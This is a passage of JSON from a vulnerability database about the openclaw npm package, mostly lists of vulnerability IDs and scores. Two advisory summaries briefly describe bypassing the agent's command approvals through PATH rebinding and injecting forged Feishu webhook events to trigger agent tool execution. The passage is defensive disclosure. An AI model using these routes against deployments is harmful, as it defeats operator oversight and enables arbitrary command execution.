nerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-9q2p-vc84-2rwm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-edn6-zer1-cya4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91300?format=json","vulnerability_id":"VCID-em6w-a7mj-mqa4","summary":"Duplicate Advisory: OpenClaw: system.run approvals did not bind PATH-token executable identity, enabling post-approval executable rebind\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-q399-23r3-hfx4. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.1 fail to pin executable identity for non-path-like argv[0] tokens in system.run approvals, allowing post-approval executable rebind attacks. Attackers can modify PATH resolution after approval to execute a different binary than the operator approved, enabling arbitrary command execution.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997","reference_id":"CVE-2026-31997","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4","reference_id":"GHSA-q399-23r3-hfx4","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4"},{"reference_url":"https://github.com/advisories/GHSA-q86m-697p-h7fh","reference_id":"GHSA-q86m-697p-h7fh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q86m-697p-h7fh"}],"fixed_packages":[],"aliases":["GHSA-q86m-697p-h7fh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-em6w-a7mj-mqa4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90982?format=json","vulnerability_id":"VCID-ewa7-qswv-tqet","summary":"OpenClaw: Feishu webhook mode accepted forged events when only `verificationToken` was configured\n### Summary\n\nFeishu webhook mode allowed deployments that configured only `verificationToken` without `encryptKey`. In that state, forged inbound events could be accepted because the weaker configuration did not provide the required cryptographic verification boundary.\n\n### Impact\n\nAn unauthenticated network attacker who could reach the webhook endpoint could inject forged Feishu events, impersonate senders, and potentially trigger downstream tool execution subject to the local agent policy.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Feishu webhook mode now fails closed unless `encryptKey` is configured, and the webhook transport rejects missing or invalid signatures before dispatch. Update to `2026.3.12` or later and configure `encryptKey` for webhook deployments.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32974","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15522","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15561","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.1557","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32974"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7844bc89a1612800810617c823eb0c76ef945804","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7844bc89a1612800810617c823eb0c76ef945804"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44087","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44087"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token"},{"reference_url":"https://github.com/advisories/GHSA-g353-mgv3-8pcj","reference_id":"GHSA-g353-mgv3-8pcj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g353-mgv3-8pcj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"}